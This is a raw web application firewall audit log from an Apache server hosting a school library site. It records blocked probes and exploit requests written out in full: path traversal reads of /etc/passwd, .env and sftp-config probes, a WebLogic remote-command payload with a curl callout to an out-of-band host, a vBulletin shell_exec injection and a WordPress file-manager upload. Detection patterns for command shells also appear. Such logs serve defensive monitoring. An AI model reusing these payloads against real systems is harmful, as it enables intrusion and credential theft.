perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173026218 --6d5e8b61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d5e8b61-E-- --6d5e8b61-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958192049819 2542 (- - -) Stopwatch2: 1748958192049819 2542; combined=682, p1=527, p2=126, p3=0, p4=0, p5=29, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5e8b61-Z-- --28f12114-A-- [03/Jun/2025:20:43:13 +0700] aD778ZAN5Lj366RdGMwAegAAAM0 103.236.140.4 52590 103.236.140.4 8181 --28f12114-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173026227 --28f12114-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28f12114-E-- --28f12114-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958193697790 1823 (- - -) Stopwatch2: 1748958193697790 1823; combined=620, p1=463, p2=124, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28f12114-Z-- --f3fd2523-A-- [03/Jun/2025:20:44:50 +0700] aD78UghM7ynDNybXsoPnNwAAAEk 103.236.140.4 53808 103.236.140.4 8181 --f3fd2523-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 Accept-Charset: utf-8 --f3fd2523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3fd2523-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748958290079852 783 (- - -) Stopwatch2: 1748958290079852 783; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3fd2523-Z-- --16b44d56-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDBAAAANM 103.236.140.4 35321 103.236.140.4 8181 --16b44d56-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173053643 --16b44d56-C-- cH --16b44d56-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --16b44d56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748959065936810 4352 (- - -) Stopwatch2: 1748959065936810 4352; combined=2747, p1=573, p2=2082, p3=29, p4=33, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16b44d56-Z-- --d97fa32b-A-- [03/Jun/2025:20:57:45 +0700] aD7_WY0G58RZMmoh8H0tCQAAAIY 103.236.140.4 35326 103.236.140.4 8181 --d97fa32b-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0us2vpgpeonc6qdbef04o3gkkt7mthf4.oast.me X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172450196 --d97fa32b-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --d97fa32b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97fa32b-E-- --d97fa32b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065936956 15015 (- - -) Stopwatch2: 1748959065936956 15015; combined=771, p1=364, p2=377, p3=0, p4=0, p5=29, sr=48, sw=1, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97fa32b-Z-- --0842bd4c-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDCAAAAM0 103.236.140.4 35358 103.236.140.4 8181 --0842bd4c-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172780490 --0842bd4c-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --0842bd4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0842bd4c-E-- --0842bd4c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065957386 1452 (- - -) Stopwatch2: 1748959065957386 1452; combined=463, p1=298, p2=140, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0842bd4c-Z-- --d857da7e-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDBwAAAMk 103.236.140.4 35344 103.236.140.4 8181 --d857da7e-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165424317 --d857da7e-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --d857da7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d857da7e-E-- --d857da7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065955150 4201 (- - -) Stopwatch2: 1748959065955150 4201; combined=2543, p1=448, p2=2066, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d857da7e-Z-- --6531dc42-A-- [03/Jun/2025:21:03:51 +0700] aD8AxwhM7ynDNybXsoPsZQAAAEg 103.236.140.4 39998 103.236.140.4 8181 --6531dc42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.123.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.123.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6531dc42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6531dc42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748959431973128 733 (- - -) Stopwatch2: 1748959431973128 733; combined=321, p1=285, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6531dc42-Z-- --cc63e02f-A-- [03/Jun/2025:21:07:03 +0700] aD8BhwhM7ynDNybXsoPtoAAAAFI 103.236.140.4 42414 103.236.140.4 8181 --cc63e02f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --cc63e02f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc63e02f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748959623890613 893 (- - -) Stopwatch2: 1748959623890613 893; combined=324, p1=282, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc63e02f-Z-- --86e95945-A-- [03/Jun/2025:22:02:52 +0700] aD8OnAhM7ynDNybXsoP9ZgAAAEc 103.236.140.4 56800 103.236.140.4 8181 --86e95945-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept-Charset: utf-8 --86e95945-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e95945-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748962972910268 907 (- - -) Stopwatch2: 1748962972910268 907; combined=410, p1=368, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e95945-Z-- --7fef4a56-A-- [03/Jun/2025:22:30:46 +0700] aD8VJghM7ynDNybXsoMFJwAAAE0 103.236.140.4 49790 103.236.140.4 8181 --7fef4a56-B-- GET /sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.253.27.128 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Cookie: X-Forwarded-For: 103.253.27.128 Accept-Encoding: gzip X-Varnish: 171896131 --7fef4a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7fef4a56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748964646083004 1002 (- - -) Stopwatch2: 1748964646083004 1002; combined=413, p1=373, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fef4a56-Z-- --0f3cab6a-A-- [03/Jun/2025:22:30:46 +0700] aD8VJo0G58RZMmoh8H08xwAAAI0 103.236.140.4 49794 103.236.140.4 8181 --0f3cab6a-B-- GET /.vscode/sftp-config.json HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.253.27.128 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Cookie: X-Forwarded-For: 103.253.27.128 Accept-Encoding: gzip X-Varnish: 173038140 --0f3cab6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f3cab6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748964646204271 711 (- - -) Stopwatch2: 1748964646204271 711; combined=265, p1=230, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f3cab6a-Z-- --50727509-A-- [03/Jun/2025:23:15:05 +0700] aD8fiZAN5Lj366RdGMwWYwAAAMM 103.236.140.4 45144 103.236.140.4 8181 --50727509-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) Accept-Charset: utf-8 --50727509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50727509-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967305174485 790 (- - -) Stopwatch2: 1748967305174485 790; combined=326, p1=284, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50727509-Z-- --a174e777-A-- [03/Jun/2025:23:18:49 +0700] aD8gaQhM7ynDNybXsoMPEgAAAEc 103.236.140.4 45172 103.236.140.4 8181 --a174e777-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --a174e777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a174e777-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967529317180 1211 (- - -) Stopwatch2: 1748967529317180 1211; combined=386, p1=334, p2=0, p3=0, p4=0, p5=52, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a174e777-Z-- --a3918c2b-A-- [03/Jun/2025:23:18:53 +0700] aD8gbQhM7ynDNybXsoMPFAAAAEU 103.236.140.4 45178 103.236.140.4 8181 --a3918c2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --a3918c2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3918c2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748967533665081 839 (- - -) Stopwatch2: 1748967533665081 839; combined=367, p1=333, p2=0, p3=0, p4=0, p5=34, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3918c2b-Z-- --7f87dd68-A-- [03/Jun/2025:23:28:41 +0700] aD8iuQhM7ynDNybXsoMPVwAAAFE 103.236.140.4 45494 103.236.140.4 8181 --7f87dd68-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 Accept-Charset: utf-8 --7f87dd68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f87dd68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748968121444369 683 (- - -) Stopwatch2: 1748968121444369 683; combined=261, p1=227, p2=0, p3=0, p4=0, p5=33, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
